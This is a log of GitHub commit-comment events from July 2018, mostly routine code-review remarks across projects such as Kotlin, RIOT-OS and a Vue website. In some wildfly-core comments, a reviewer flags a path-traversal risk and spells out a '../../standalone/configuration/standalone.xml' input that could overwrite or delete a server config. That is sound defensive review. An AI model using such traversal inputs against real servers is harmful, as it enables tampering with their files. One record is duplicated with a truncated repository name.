{"id":"7943618823","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29656081,"position":17,"line":17,"path":"compiler/testData/codegen/box/inlineClasses/castInsideWhenExpression.kt","commit_id":"93bb49df6ec6f46d7d86b344aadf4b84ceb2ec9a","created_at":"2018-07-10T12:58:19Z","updated_at":"2018-07-10T12:58:19Z","author_association":"MEMBER","body":"TBH, I didn't get how this test works\r\nBoxing (with consequent unboxing) still can happen inside `transform` function can't it?"}},"created_at":"2018-07-10T12:58:19Z"}
{"id":"7943619154","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29656082,"position":21,"line":21,"path":"src/containers/Beauty/Detail.vue","commit_id":"01f212f5cb1728bcd5ff748bba73844bef0e1dd5","created_at":"2018-07-10T12:58:22Z","updated_at":"2018-07-10T12:58:22Z","author_association":"CONTRIBUTOR","body":"10/10"}},"created_at":"2018-07-10T12:58:22Z"}
{"id":"7943622671","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29656091,"position":2,"line":2,"path":"src/containers/Beauty/Detail.vue","commit_id":"01f212f5cb1728bcd5ff748bba73844bef0e1dd5","created_at":"2018-07-10T12:58:58Z","updated_at":"2018-07-10T12:58:58Z","author_association":"CONTRIBUTOR","body":"- [ ] rename class to `\"Beauty\"`"}},"created_at":"2018-07-10T12:58:58Z"}
{"id":"7943622907","type":"CommitCommentEvent","actor":{"login":"TheMatrix97"},"repo":{"name":"XaviRT/CreandoCuestionario"},"payload":{"comment":{"id":29656092,"position":null,"line":null,"path":null,"commit_id":"12c7ce66d917e8d26055cd90af74617de20234b6","created_at":"2018-07-10T12:59:01Z","updated_at":"2018-07-10T12:59:01Z","author_association":"NONE","body":"que significa me peta? xD deberias de \"copy pastear\" el stacktrace que devuelve java (error del logcat)"}},"created_at":"2018-07-10T12:59:01Z"}
{"id":"7943624552","type":"CommitCommentEvent","actor":{"login":"smlng"},"repo":{"name":"RIOT-OS/RIOT"},"payload":{"comment":{"id":29656096,"position":null,"line":null,"path":null,"commit_id":"202e73dcdf8dd69dcf3291e95580df96cfb4d15a","created_at":"2018-07-10T12:59:19Z","updated_at":"2018-07-10T12:59:19Z","author_association":"MEMBER","body":"This breaks building on macOS:\r\n\r\n```\r\n make -C tests/pthread clean all\r\n\r\nBuilding application \"tests_pthread\" for \"native\" with MCU \"native\".\r\n\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/boards/native\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/boards/native/drivers\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/core\r\n/Library/Developer/CommandLineTools/usr/bin/ranlib: file: /Volumes/devel/github/smlng/RIOT/tests/pthread/bin/native/core.a(atomic_sync.o) has no symbols\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/cpu/native\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/cpu/native/periph\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/cpu/native/vfs\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/drivers\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/drivers/periph_common\r\n/Library/Developer/CommandLineTools/usr/bin/ranlib: file: /Volumes/devel/github/smlng/RIOT/tests/pthread/bin/native/periph_common.a(cpuid.o) has no symbols\r\n/Library/Developer/CommandLineTools/usr/bin/ranlib: file: /Volumes/devel/github/smlng/RIOT/tests/pthread/bin/native/periph_common.a(eeprom.o) has no symbols\r\n/Library/Developer/CommandLineTools/usr/bin/ranlib: file: /Volumes/devel/github/smlng/RIOT/tests/pthread/bin/native/periph_common.a(flashpage.o) has no symbols\r\n/Library/Developer/CommandLineTools/usr/bin/ranlib: file: /Volumes/devel/github/smlng/RIOT/tests/pthread/bin/native/periph_common.a(pm.o) has no symbols\r\n/Library/Developer/CommandLineTools/usr/bin/ranlib: file: /Volumes/devel/github/smlng/RIOT/tests/pthread/bin/native/periph_common.a(spi.o) has no symbols\r\n/Library/Developer/CommandLineTools/usr/bin/ranlib: file: /Volumes/devel/github/smlng/RIOT/tests/pthread/bin/native/periph_common.a(timer.o) has no symbols\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/sys\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/sys/auto_init\r\n/Library/Developer/CommandLineTools/usr/bin/ranlib: file: /Volumes/devel/github/smlng/RIOT/tests/pthread/bin/native/auto_init.a(auto_init_sht1x.o) has no symbols\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/sys/div\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/sys/posix\r\n\"/Library/Developer/CommandLineTools/usr/bin/make\" -C /Volumes/devel/github/smlng/RIOT/sys/posix/pthread\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:73:5: error: unknown type name '__pthread_cleanup_datum_t'\r\n    __pthread_cleanup_datum_t *cleanup_top;\r\n    ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:115:9: error: implicit declaration of function 'free' is invalid in C99 [-Werror,-Wimplicit-function-declaration]\r\n        free(m.content.ptr);\r\n        ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:115:9: error: this function declaration is not a prototype [-Werror,-Wstrict-prototypes]\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:123:28: error: implicitly declaring library function 'calloc' with type 'void *(unsigned long, unsigned long)' [-Werror,-Wimplicit-function-declaration]\r\n    pthread_thread_t *pt = calloc(1, sizeof(pthread_thread_t));\r\n                           ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:123:28: note: include the header <stdlib.h> or explicitly provide a declaration for 'calloc'\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:130:16: error: incompatible integer to pointer conversion assigning to 'pthread_t' (aka 'struct _opaque_pthread_t *') from 'kernel_pid_t' (aka 'short') [-Werror,-Wint-conversion]\r\n    *newthread = pthread_pid;\r\n               ^ ~~~~~~~~~~~\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:132:32: error: no member named 'detached' in 'struct _opaque_pthread_attr_t'\r\n    pt->status = attr && attr->detached ? PTS_DETACHED : PTS_RUNNING;\r\n                         ~~~~  ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:136:43: error: no member named 'ss_sp' in 'struct _opaque_pthread_attr_t'\r\n    bool autofree = attr == NULL || attr->ss_sp == NULL || attr->ss_size == 0;\r\n                                    ~~~~  ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:136:66: error: no member named 'ss_size' in 'struct _opaque_pthread_attr_t'\r\n    bool autofree = attr == NULL || attr->ss_sp == NULL || attr->ss_size == 0;\r\n                                                           ~~~~  ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:137:39: error: no member named 'ss_size' in 'struct _opaque_pthread_attr_t'\r\n    size_t stack_size = attr && attr->ss_size > 0 ? attr->ss_size : PTHREAD_STACKSIZE;\r\n                                ~~~~  ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:137:59: error: no member named 'ss_size' in 'struct _opaque_pthread_attr_t'\r\n    size_t stack_size = attr && attr->ss_size > 0 ? attr->ss_size : PTHREAD_STACKSIZE;\r\n                                                    ~~~~  ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:138:30: error: implicitly declaring library function 'malloc' with type 'void *(unsigned long)' [-Werror,-Wimplicit-function-declaration]\r\n    void *stack = autofree ? malloc(stack_size) : attr->ss_sp;\r\n                             ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:138:30: note: include the header <stdlib.h> or explicitly provide a declaration for 'malloc'\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:138:57: error: no member named 'ss_sp' in 'struct _opaque_pthread_attr_t'\r\n    void *stack = autofree ? malloc(stack_size) : attr->ss_sp;\r\n                                                  ~~~~  ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:185:55: error: array subscript is not an integer\r\n        pthread_thread_t *self = pthread_sched_threads[self_id - 1];\r\n                                                      ^~~~~~~~~~~~\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:188:13: error: use of undeclared identifier '__pthread_cleanup_datum_t'\r\n            __pthread_cleanup_datum_t *ct = self->cleanup_top;\r\n            ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:188:40: error: use of undeclared identifier 'ct'\r\n            __pthread_cleanup_datum_t *ct = self->cleanup_top;\r\n                                       ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:189:33: error: use of undeclared identifier 'ct'\r\n            self->cleanup_top = ct->__next;\r\n                                ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:191:13: error: use of undeclared identifier 'ct'\r\n            ct->__routine(ct->__arg);\r\n            ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:191:27: error: use of undeclared identifier 'ct'\r\n            ct->__routine(ct->__arg);\r\n                          ^\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:197:33: error: incompatible pointer to integer conversion passing 'pthread_t' (aka 'struct _opaque_pthread_t *') to parameter of type 'int' [-Werror,-Wint-conversion]\r\n            __pthread_keys_exit(self_id);\r\n                                ^~~~~~~\r\n/Volumes/devel/github/smlng/RIOT/sys/posix/pthread/pthread.c:195:45: note: passing argument to parameter 'self_id' here\r\n        extern void __pthread_keys_exit(int self_id) __attribute__((weak));\r\n                                            ^\r\nfatal error: too many errors emitted, stopping now [-ferror-limit=]\r\n20 errors generated.\r\n```"}},"created_at":"2018-07-10T12:59:19Z"}
{"id":"7943625743","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29656098,"position":4,"line":4,"path":"src/containers/Beauty/Detail.vue","commit_id":"01f212f5cb1728bcd5ff748bba73844bef0e1dd5","created_at":"2018-07-10T12:59:32Z","updated_at":"2018-07-10T12:59:32Z","author_association":"CONTRIBUTOR","body":"- [ ] rename class to `\"Beauty__inner\"`"}},"created_at":"2018-07-10T12:59:32Z"}
{"id":"7943625983","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29656099,"position":17,"line":17,"path":"compiler/testData/codegen/box/inlineClasses/castInsideWhenExpression.kt","commit_id":"93bb49df6ec6f46d7d86b344aadf4b84ceb2ec9a","created_at":"2018-07-10T12:59:35Z","updated_at":"2018-07-10T12:59:35Z","author_association":"MEMBER","body":"And e.g. in JS this test seems to be passing as well, and there, boxing happens all the time at the moment"}},"created_at":"2018-07-10T12:59:35Z"}
{"id":"7943628952","type":"CommitCommentEvent","actor":{"login":"BastianKusserow"},"repo":{"name":"HochschuleHofStundenplanapp/AndroidStundenplanHof"},"payload":{"comment":{"id":29656105,"position":null,"line":null,"path":null,"commit_id":"972cbbbde2bbe0fac549f0b7078f123efb3b9c68","created_at":"2018-07-10T13:00:05Z","updated_at":"2018-07-10T13:00:05Z","author_association":"CONTRIBUTOR","body":"Im import steht doch aber schon das android.support.v4.app.Fragment? Und der Import steht immernoch drin, jetzt wird das Fragment umsonst importiert."}},"created_at":"2018-07-10T13:00:05Z"}
{"id":"7943629384","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/matyoo111"},"payload":{"comment":{"id":29656106,"position":40,"line":40,"path":"week-08/reddit/src/main/java/com/greenfoxacademy/reddit/controllers/RedditController.java","commit_id":"aaa0a9d05cf4db2761d5ccba8ac99956341c21b2","created_at":"2018-07-10T13:00:10Z","updated_at":"2018-07-10T13:00:10Z","author_association":"NONE","body":"A controller should\r\n- get requests\r\n- pass the received data to a service\r\n- send back the answer\r\nA service should\r\n- work with incoming data(check/modify)\r\n- ask the repositiry to do database operations\r\n- figure out the answer for the controller\r\nA repo should\r\n- do db operations(no logical code)"}},"created_at":"2018-07-10T13:00:10Z"}
{"id":"7943629988","type":"CommitCommentEvent","actor":{"login":"mchoma"},"repo":{"name":"fjuma/wildfly-core"},"payload":{"comment":{"id":29656110,"position":51,"line":51,"path":"elytron/src/main/java/org/wildfly/extension/elytron/WildFlyAcmeClient.java","commit_id":"50f6e936314d359cef1e41309e476bc118c20415","created_at":"2018-07-10T13:00:16Z","updated_at":"2018-07-10T13:00:16Z","author_association":"NONE","body":"Again. Beeing paranoid and thinking about the fact service is exposed publicly. Isn't there way attacker can fake selectedChallenge.getToken()? And so rewrite for example $jboss.home.dir/.well-known/acme-challenge/../../standalone/configuration/standalone.xml. How is this real?"}},"created_at":"2018-07-10T13:00:16Z"}
{"id":"7943630198","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29656113,"position":19,"line":19,"path":"src/containers/Beauty/Detail.vue","commit_id":"01f212f5cb1728bcd5ff748bba73844bef0e1dd5","created_at":"2018-07-10T13:00:18Z","updated_at":"2018-07-10T13:00:18Z","author_association":"CONTRIBUTOR","body":"add `class=\"Beauty__title\"`"}},"created_at":"2018-07-10T13:00:18Z"}
{"id":"7943633169","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29656120,"position":27,"line":27,"path":"src/containers/Beauty/Detail.vue","commit_id":"01f212f5cb1728bcd5ff748bba73844bef0e1dd5","created_at":"2018-07-10T13:00:46Z","updated_at":"2018-07-10T13:00:46Z","author_association":"CONTRIBUTOR","body":"swap for class `\"Beauty__inner\"`"}},"created_at":"2018-07-10T13:00:46Z"}
{"id":"7943634972","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29656123,"position":36,"line":36,"path":"src/containers/Beauty/Detail.vue","commit_id":"01f212f5cb1728bcd5ff748bba73844bef0e1dd5","created_at":"2018-07-10T13:01:05Z","updated_at":"2018-07-10T13:01:05Z","author_association":"CONTRIBUTOR","body":"add `class=\"Beauty__image\"`"}},"created_at":"2018-07-10T13:01:05Z"}
{"id":"7943639934","type":"CommitCommentEvent","actor":{"login":"UdjinM6"},"repo":{"name":"dashpay/dash"},"payload":{"comment":{"id":29656132,"position":5,"line":420,"path":"src/privatesend.cpp","commit_id":"e4a4e59275f38d22320803577dfd81d1e68a0aca","created_at":"2018-07-10T13:01:53Z","updated_at":"2018-07-10T13:01:53Z","author_association":"NONE","body":"See https://google.github.io/styleguide/cppguide.html#Preincrement_and_Predecrement :)"}},"created_at":"2018-07-10T13:01:53Z"}
{"id":"7943641950","type":"CommitCommentEvent","actor":{"login":"aksr"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29656138,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-10T13:02:14Z","updated_at":"2018-07-10T13:02:14Z","author_association":"NONE","body":"@n-t-roff: I agree, just ...\r\nI think `typo-tests` should be first merged in `n-t-roff` repo, then `n-t-roff` should be forked becoming the new `typo-tests` repository (since quite a few bugs have been fixed in `n-t-roff` *after* the fork)."}},"created_at":"2018-07-10T13:02:14Z"}
{"id":"7943644554","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29656148,"position":15,"line":145,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/calls/tower/ResolvedAtomCompleter.kt","commit_id":"25d55aa7ad96d6a1fb76697aa659a4bafd9b76ec","created_at":"2018-07-10T13:02:41Z","updated_at":"2018-07-10T13:02:41Z","author_association":"MEMBER","body":"`ktFunction is KtNamedFunction && nameIdentifier != null` probably "}},"created_at":"2018-07-10T13:02:41Z"}
{"id":"7943645863","type":"CommitCommentEvent","actor":{"login":"mchoma"},"repo":{"name":"fjuma/wildfly-core"},"payload":{"comment":{"id":29656151,"position":62,"line":62,"path":"elytron/src/main/java/org/wildfly/extension/elytron/WildFlyAcmeClient.java","commit_id":"50f6e936314d359cef1e41309e476bc118c20415","created_at":"2018-07-10T13:02:55Z","updated_at":"2018-07-10T13:02:55Z","author_association":"NONE","body":"And analogy removing $jboss.home.dir/.well-known/acme-challenge/../../standalone/configuration/standalone.xml.\r\nIs it possible to validate we do not get out of /.well-known/acme-challenge direcotry?"}},"created_at":"2018-07-10T13:02:55Z"}
{"id":"7943650118","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29656164,"position":58,"line":58,"path":"src/containers/Beauty/Detail.vue","commit_id":"01f212f5cb1728bcd5ff748bba73844bef0e1dd5","created_at":"2018-07-10T13:03:38Z","updated_at":"2018-07-10T13:03:38Z","author_association":"CONTRIBUTOR","body":"replace all styles with:\r\n```\r\n.Beauty {\r\n\r\n     &__inner {\r\n        width: 1140px;\r\n        margin: auto;\r\n        display: block;\r\n    }\r\n\r\n    &__title {\r\n          text-align: center\r\n    }\r\n\r\n    &__image {\r\n         margin: auto\r\n    }\r\n}\r\n```"}},"created_at":"2018-07-10T13:03:38Z"}
{"id":"7943652382","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29656170,"position":58,"line":58,"path":"src/containers/Beauty/Detail.vue","commit_id":"01f212f5cb1728bcd5ff748bba73844bef0e1dd5","created_at":"2018-07-10T13:04:04Z","updated_at":"2018-07-10T13:04:04Z","author_association":"CONTRIBUTOR","body":"> this will make styles reusable and just generally way better - I'll explain properly on wednesday"}},"created_at":"2018-07-10T13:04:04Z"}
{"id":"7943652600","type":"CommitCommentEvent","actor":{"login":"MattMattV"},"repo":{"name":"MattMattV/after-dark"},"payload":{"comment":{"id":29656172,"position":null,"line":null,"path":null,"commit_id":"19fa17bdb044830f31bfb7e0be2a025a37899d26","created_at":"2018-07-10T13:04:07Z","updated_at":"2018-07-10T13:04:07Z","author_association":"OWNER","body":"Adding the partial to add it to the rendered page was easy but the back office wasn't showing any visits, despite having smashed hard F5, I need to investigate more ! I like a lot the simplicity of the project, I MUST get it to work !"}},"created_at":"2018-07-10T13:04:07Z"}
{"id":"7943653859","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29656178,"position":55,"line":55,"path":"src/containers/Beauty/Detail.vue","commit_id":"01f212f5cb1728bcd5ff748bba73844bef0e1dd5","created_at":"2018-07-10T13:04:19Z","updated_at":"2018-07-10T13:04:19Z","author_association":"CONTRIBUTOR","body":"remove the word `scoped` and remove the style import from the line below"}},"created_at":"2018-07-10T13:04:19Z"}
{"id":"7943657883","type":"CommitCommentEvent","actor":{"login":"hoangtuan51096"},"repo":{"name":"NguyenHuuDuc1006/PHPDN33_DTTT"},"payload":{"comment":{"id":29656189,"position":null,"line":null,"path":null,"commit_id":"adb7af82c3f64b2b47cf8108db0eef42db1fe601","created_at":"2018-07-10T13:05:00Z","updated_at":"2018-07-10T13:05:00Z","author_association":"NONE","body":"chém gió vừa thôi lạnh lắm"}},"created_at":"2018-07-10T13:05:00Z"}
{"id":"7943659507","type":"CommitCommentEvent","actor":{"login":"shimkijun"},"repo":{"name":"shimkijun/developer_zstar"},"payload":{"comment":{"id":29656193,"position":15,"line":8,"path":"index.html","commit_id":"4a130ef1c38611f65fc7fd59a53ad8da182a5d7c","created_at":"2018-07-10T13:05:14Z","updated_at":"2018-07-10T13:05:14Z","author_association":"OWNER","body":"fdsfasdfdsafasd"}},"created_at":"2018-07-10T13:05:14Z"}
{"id":"7943660160","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29656194,"position":null,"line":null,"path":null,"commit_id":"02e40d97fb15e3e870e4c53ee209d8c1d2557fcd","created_at":"2018-07-10T13:05:20Z","updated_at":"2018-07-10T13:05:20Z","author_association":"MEMBER","body":"Fixed with https://github.com/NixOS/nixpkgs/pull/43276."}},"created_at":"2018-07-10T13:05:20Z"}
{"id":"7943660399","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/matyoo111"},"payload":{"comment":{"id":29656196,"position":null,"line":null,"path":null,"commit_id":"aaa0a9d05cf4db2761d5ccba8ac99956341c21b2","created_at":"2018-07-10T13:05:22Z","updated_at":"2018-07-10T13:05:22Z","author_association":"NONE","body":"This is an ultra-super-mega-giga-uber-giant commit that includes multiple exercises. Please commit much more often. Little commits help us to follow the changes in the code and if made a mistake it is much easier to find the exact line that shouldn't be changed or there is something that should be fixed. "}},"created_at":"2018-07-10T13:05:22Z"}
{"id":"7943662720","type":"CommitCommentEvent","actor":{"login":"amarp-synerzip"},"repo":{"name":"priyankap-synerzip/MealsPlusAutomation"},"payload":{"comment":{"id":29656202,"position":2,"line":2,"path":"src/main/resources/locators/AddStudentPage.yml","commit_id":"c46b48e12c07ef28294866a48b7e3008dda6b2c4","created_at":"2018-07-10T13:05:47Z","updated_at":"2018-07-10T13:05:47Z","author_association":"COLLABORATOR","body":"do not leave empty lines"}},"created_at":"2018-07-10T13:05:47Z"}
{"id":"7943664271","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656205,"position":96,"line":96,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:06:05Z","updated_at":"2018-07-10T13:06:05Z","author_association":"NONE","body":"if (!mem) return NULL;"}},"created_at":"2018-07-10T13:06:05Z"}
{"id":"7943666980","type":"CommitCommentEvent","actor":{"login":"larsbrinkhoff"},"repo":{"name":"PDP-10/its"},"payload":{"comment":{"id":29656214,"position":null,"line":null,"path":null,"commit_id":"58a9467a714cbfe9c220a98d1cd59982645394eb","created_at":"2018-07-10T13:06:33Z","updated_at":"2018-07-10T13:06:33Z","author_association":"MEMBER","body":"Shouldn't the old versions be removed?"}},"created_at":"2018-07-10T13:06:33Z"}
{"id":"7943667458","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29656215,"position":43,"line":43,"path":"src/containers/Beauty/Detail.vue","commit_id":"01f212f5cb1728bcd5ff748bba73844bef0e1dd5","created_at":"2018-07-10T13:06:38Z","updated_at":"2018-07-10T13:06:38Z","author_association":"CONTRIBUTOR","body":"- [ ] remove this script block since it isn't currently in use"}},"created_at":"2018-07-10T13:06:38Z"}
{"id":"7943668641","type":"CommitCommentEvent","actor":{"login":"amarp-synerzip"},"repo":{"name":"priyankap-synerzip/MealsPlusAutomation"},"payload":{"comment":{"id":29656220,"position":31,"line":31,"path":"src/test/java/TestCases/AddStudentTest.java","commit_id":"c46b48e12c07ef28294866a48b7e3008dda6b2c4","created_at":"2018-07-10T13:06:51Z","updated_at":"2018-07-10T13:06:51Z","author_association":"COLLABORATOR","body":"do not use wait until in tests.\r\nadd expected conditions at page level itself"}},"created_at":"2018-07-10T13:06:51Z"}
{"id":"7943669762","type":"CommitCommentEvent","actor":{"login":"zarechenskiy"},"repo":{"name":"JetBrains/"},"payload":{"comment":{"id":29656224,"position":17,"line":17,"path":"compiler/testData/codegen/box/inlineClasses/castInsideWhenExpression.kt","commit_id":"93bb49df6ec6f46d7d86b344aadf4b84ceb2ec9a","created_at":"2018-07-10T13:07:03Z","updated_at":"2018-07-10T13:07:03Z","author_association":"MEMBER","body":"Yeah, I'll update the description. Actual problem is that there were no unboxing, because we didn't know result type of when expression, so `transform` function returned boxed value."}},"created_at":"2018-07-10T13:07:03Z"}
{"id":"7943669762","type":"CommitCommentEvent","actor":{"login":"zarechenskiy"},"repo":{"name":"JetBrains/"},"payload":{"comment":{"id":29656224,"position":17,"line":17,"path":"compiler/testData/codegen/box/inlineClasses/castInsideWhenExpression.kt","commit_id":"93bb49df6ec6f46d7d86b344aadf4b84ceb2ec9a","created_at":"2018-07-10T13:07:03Z","updated_at":"2018-07-10T13:07:03Z","author_association":"MEMBER","body":"Yeah, I'll update the description. Actual problem is that there were no unboxing, because we didn't know result type of when expression, so `transform` function returned boxed value."}},"created_at":"2018-07-10T13:07:03Z"}
{"id":"7943670454","type":"CommitCommentEvent","actor":{"login":"PatrickRudolph"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656227,"position":139,"line":139,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:07:11Z","updated_at":"2018-07-10T13:07:11Z","author_association":"CONTRIBUTOR","body":"can be removed"}},"created_at":"2018-07-10T13:07:11Z"}
{"id":"7943672238","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29656231,"position":1,"line":1,"path":"src/containers/Lifestyle/Detail.vue","commit_id":"01f212f5cb1728bcd5ff748bba73844bef0e1dd5","created_at":"2018-07-10T13:07:29Z","updated_at":"2018-07-10T13:07:29Z","author_association":"CONTRIBUTOR","body":"- [ ] duplicate all changed for the Beauty section except with the word Beauty swapped for Lifestyle"}},"created_at":"2018-07-10T13:07:29Z"}
{"id":"7943673067","type":"CommitCommentEvent","actor":{"login":"MahnoorZS"},"repo":{"name":"MahnoorZS/btc440"},"payload":{"comment":{"id":29656234,"position":null,"line":null,"path":null,"commit_id":"901c115e714c0cde4459c2ebb376de4abb5d4eab","created_at":"2018-07-10T13:07:38Z","updated_at":"2018-07-10T13:07:38Z","author_association":"OWNER","body":"Hello"}},"created_at":"2018-07-10T13:07:38Z"}
{"id":"7943673138","type":"CommitCommentEvent","actor":{"login":"PatrickRudolph"},"repo":{"name":"9elements/fwts"},"payload":{"comment":{"id":29656237,"position":299,"line":299,"path":"src/lib/src/fwts_coreboot_cbmem.c","commit_id":"d187d20ee803613f61777330cabfff8ce0aa67f3","created_at":"2018-07-10T13:07:39Z","updated_at":"2018-07-10T13:07:39Z","author_association":"CONTRIBUTOR","body":"can be removed"}},"created_at":"2018-07-10T13:07:39Z"}
{"id":"7943675003","type":"CommitCommentEvent","actor":{"login":"oznetmaster"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29656242,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T13:08:00Z","updated_at":"2018-07-10T13:08:00Z","author_association":"CONTRIBUTOR","body":"That would eliminate all timeout and max time capabilities, which are widely used by those who use the CF version.  I think the risk of a infinite loop in the tear down is a good trade off for having the other capabilities."}},"created_at":"2018-07-10T13:08:00Z"}
{"id":"7943675372","type":"CommitCommentEvent","actor":{"login":"suchen2018"},"repo":{"name":"suchen2018/Data-structure-studying"},"payload":{"comment":{"id":29656243,"position":null,"line":null,"path":null,"commit_id":"83276b8b43485203bc937b906999e6d6552d7077","created_at":"2018-07-10T13:08:04Z","updated_at":"2018-07-10T13:08:04Z","author_association":"OWNER","body":"列队类的实现"}},"created_at":"2018-07-10T13:08:04Z"}
{"id":"7943675726","type":"CommitCommentEvent","actor":{"login":"thijskh"},"repo":{"name":"simplesamlphp/simplesamlphp"},"payload":{"comment":{"id":29656244,"position":null,"line":null,"path":null,"commit_id":"250e7e2b71775ca6a3c2e9c6dc9e7773fec08797","created_at":"2018-07-10T13:08:08Z","updated_at":"2018-07-10T13:08:08Z","author_association":"MEMBER","body":"Setting the default to NULL or FALSE is not a clean solution in any case. Because we're feeding setopt with the wrong type.\r\n\r\nIt works now, so I'll go ahead with this solution for 1.16. For master we'd likely want to implement something cleaner and perhaps in one place in the code."}},"created_at":"2018-07-10T13:08:08Z"}
{"id":"7943676553","type":"CommitCommentEvent","actor":{"login":"agustinaarroyuelo"},"repo":{"name":"agustinaarroyuelo/pymc3"},"payload":{"comment":{"id":29656245,"position":null,"line":null,"path":null,"commit_id":"896e38cd49ff82d9b4835a9799592226e0147aac","created_at":"2018-07-10T13:08:16Z","updated_at":"2018-07-10T13:08:16Z","author_association":"OWNER","body":"Merge branch master"}},"created_at":"2018-07-10T13:08:16Z"}
{"id":"7943677140","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29656246,"position":null,"line":null,"path":null,"commit_id":"01f212f5cb1728bcd5ff748bba73844bef0e1dd5","created_at":"2018-07-10T13:08:21Z","updated_at":"2018-07-10T13:08:21Z","author_association":"CONTRIBUTOR","body":"Nice work!"}},"created_at":"2018-07-10T13:08:21Z"}
